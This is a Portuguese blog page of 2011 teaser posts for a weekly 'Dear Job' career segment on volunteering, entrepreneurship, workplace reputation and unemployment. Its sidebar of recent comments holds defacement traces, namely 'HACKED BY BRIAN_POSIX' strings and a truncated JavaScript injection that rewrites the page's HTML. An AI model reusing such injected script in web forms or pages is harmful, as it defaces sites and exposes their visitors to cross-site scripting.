Dear Job @ 18:17

Seg, 10/10/11

Se procura mudar de trabalho, uma promoção ou de um emprego, o voluntariado pode ser o caminho. Actualmente o trabalho de voluntariado está a ser crescentemente credibilizado pelos departamentos de Recrutamento e Selecção como experiência real de trabalho.

 

E, pensando bem, porque não o deveriam fazer? Este pode contribuir para o seu desenvolvimento pessoal e profissional como outros empregos e, normalmente, tendo estas organizações recursos -humanos e económicos- bastante limitados, a execução dos seus projectos obriga a um exercício constante de criatividade, eficiência e trabalho de equipa extremamente úteis para qualquer empresa que esteja a atravessar estes momentos difíceis.

 

Além das competências, o voluntariado também pode ser uma excelente oportunidade para conhecer novas pessoas, aumentar o seu network e, quem sabe, fazer contactos úteis para o seu futuro. No próximo Dear Job vamos falar sobre o papel que o voluntariado pode ter no seu futuro. Como ajudar os outros, pode acabar por ajudar-nos a nós.

 


Tags:


Dear Job @ 18:16

Seg, 26/09/11

São diversas e regulares as notícias da crise no comércio tradicional e das lojas que são obrigadas a fechar. Numa notícia recente foi dito que, em Portugal, fecham cerca de 30 a 40 lojas do comércio tradicional todos os dias. Só na zona de Lisboa chega às dezenas. Desde 1985. o comércio tradicional perdeu mais de 70% da sua importância no mercado e fecharam cerca de 24 mil lojas. No entanto também vemos negócios que estão a prosperar e a ter sucesso em locais que se tornam crescentemente desertas de comércio.

 

Qual a razão deste sucesso? Porque é que alguns estabelecimentos fecham e outros triplicam de negócio em 3 meses?

 

No próximo Dear Job vamos analisar alguns casos, aprender com quem está a prosperar e ver como aplicar os seus ensinamentos ao nosso próprio negócio.

 


Tags:


Dear Job @ 18:16

Seg, 12/09/11

Estamos a viver um período bastante complicado na nossa história económica.

 

As pessoas e as empresas vivem numa pressão constante para apresentar resultados de modo a manterem o seu emprego e negócio em funcionamento. O tempo em que o dinheiro aparecia de modo “fácil” e que era possível alcançar uma grande margem de lucro terminou. No futuro poderemos voltar a viver tempos assim...mas não no presente e não nos próximos anos.

 

No Dear Job desta semana vamos abordar o que líderes e as equipas podem e devem fazer para criarem um ambiente onde, apesar de tudo que se está a passar, consigam estar motivados, focados e a alcançarem os resultados necessários.

 


Tags:


Dear Job @ 19:10

Seg, 18/07/11

Num mundo que está a mudar a uma velocidade vertiginosa é muito importante saber escolher a sua profissão e a escola onde vai poder aprendê-la.

 

Esqueça os velhos cursos em que ninguém sabe muito bem para aquilo que servem, estamos na era do fazer! Do produzir. Chegou o momento em que as empresas que têm ideias, as devem implementar.

 

O IEFP lançou um relatório preliminar com uma lista  de 129 profissões. Elaborado por um grupo de trabalho criado para o efeito, composto por representantes dos parceiros sociais do IEFP, da Agência Nacional para a Qualificação e do gabinete de planeamento do Ministério da Economia, o grupo concentrou-se nas profissões com potencial de expansão e que, simultaneamente, possam ser ocupadas por pessoas com o ensino secundário e pós-secundário.  É dessas profissões com futuro que iremos falar. 

 

Ah, e atenção, não vamos falar de emprego, mas sim de profissões!

 


Tags:


Dear Job @ 19:48

Seg, 04/07/11

Ao contrário do esperado, e longe da sabedoria popular, a aproximação do período de férias é, para cada vez mais pessoas, uma razão para andarem ansiosas e com níveis de stress elevados.

Pessoas que, em vez de desejarem que chegue o momento do seu merecido descanso, apenas vão tirar uns dias porque são obrigadas.

Mas o que poderá estar por detrás deste tipo de comportamentos? O que poderá levar estas pessoas a terem medo das férias?

No Brasil foi realizado um estudo onde 40% dos inquiridos afirmaram não quererem ir de férias com medo de não terem trabalho quando voltassem.

Com a actual situação económica que se vive em Portugal, decerto o mesmo passa pela cabeça de muitos portugueses.

No entanto, nem tudo está relacionado com o trabalho. Para outros, o pensamento de voltarem a estar com a família e parentes próximos durante uns dias, sem terem como fugir, é razão suficiente para não conseguirem dormir à noite.

As razões podem ser muitas, indo desde as profissionais às pessoais. Por isso, no próximo Dear Job, vamos falar sobre o que é este medo das férias. O que está por detrás deste fenómeno e o que podemos fazer em relação a ele.

 


Tags:


Dear Job @ 19:10

Seg, 20/06/11

Nas últimas semanas temos recebido diversos contactos a pedir informações sobre como montar o próprio negócio.

 

As perguntas vão desde como estruturar o negócio até quais os custos envolvidos para iniciar, para dar aquele passo em frente.

 

O Dear Job desta semana será dedicado especialmente para estas pessoas jovens, motivadas e cheias de ambição que nos têm contactado.

 

Iremos mostrar um esquema de Modelo de Negócios muito útil para quem deseja dar o salto para o seu próprio sonho. Explicar as suas mais valias, como o preencher e, no final, deixaremos um desafio muito especial a todos os que estão a pensar mudar a sua vida, criando o seu próprio futuro.

 


Tags:


Dear Job @ 19:04

Seg, 06/06/11

A taxa de desemprego em Portugal não pára de aumentar tendo já sido afixada em 12,2% pela Eurostat.

 

A juntar a estes dados, um estudo realizado em 14 países europeus, revela que Portugal é o país onde há maior dificuldade em equilibrar trabalho e vida pessoal, seguido da Espanha, Grécia e Holanda.

 

Na procura de novos rumos e qualidade de vida a população qualificada portuguesa tem procurado o seu futuro na emigração para outros países da União Europeia.

 

No entanto há outras alternativas que têm sido exploradas por um grupo inovador, corajoso, que não quer sair do país. Bem pelo contrario, querem encontrar no seu país um novo lugar onde podem combinar a qualidade de vida com os seus projectos profissionais.

 

Para os ajudar surgiu o projecto Novos Povoadores que procura auxiliar estes empreendedores a estabelecerem-se em zonas do interior de Portugal, trocando o stress da cidade, pelo sossego do campo.

 

No próximo Dear Job vamos falar sobre este projecto e do que ele pode fazer por si.

 


Tags:


Dear Job @ 19:06

Seg, 23/05/11

Intuitivamente sabemos que a nossa reputação no local de trabalho é importante. Podemos ser consideradas como a pessoa ideal para lidar com uma emergência, para tratar daquele cliente difícil de agradar, ou aquela que não falha quando estamos numa situação de grande pressão.

 

Na realidade, a sua reputação pode ser ainda mais importante do que pensa. Estudos recentes vieram demonstrar que a nossa Reputação é um grande preditor do nosso sucesso profissional, mais até do que outros factores mais “clássicos”. Sendo assim, a questão para ter sucesso já não é “quem conhecemos?”, mas sim “como nos vêem?”.


De uma forma resumida, a nossa reputação é o que irá determinar se as outras pessoas nos irão dar a sua atenção, o seu respeito e, em alguns casos, o seu dinheiro.

 

No Dear Job desta semana vamos falar sobre a Reputação. O que é, porque é tão importante para o nosso o sucesso profissional e como começarmos a trabalhar rumo à reputação que pretendemos ter.

 


Tags:


Dear Job @ 18:56

Seg, 25/04/11

Vivemos num mercado bastante competitivo onde, cada pessoa que procura um emprego tem de se saber distinguir dos outros. Mostrar que está mais disponível, mais apto, que quer mais aquela oportunidade.

 

No Dear Job desta semana iremos falar sobre 3 aspectos que separam os “bons” dos “excelentes” candidatos a um emprego e que serão uma mais valia para si no futuro.

 


Tags:


Dear Job @ 19:06

Seg, 11/04/11

Nesta altura em que o desemprego é uma realidade bastante presente, um dos caminhos apontados para lutar contra esta corrente é o empreendedorismo, a criação do nosso próprio negócio. Para muitos esta realidade é o sinal que precisavam para irem atrás do seu sonho, para seguirem com os projectos que tinham guardados na gaveta e que tinham vindo a adiar.

 

No próximo Dear Job vamos conhecer a história de 4 empresas inovadoras no seu sector que procuram dar resposta a um vazio que encontraram no mercado. Vamos falar sobre o que motivou estes empreendedores a dar o "salto", ouvir os conselhos que têm para nos dar e que lições é que podemos aprender com cada um deles.

 


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO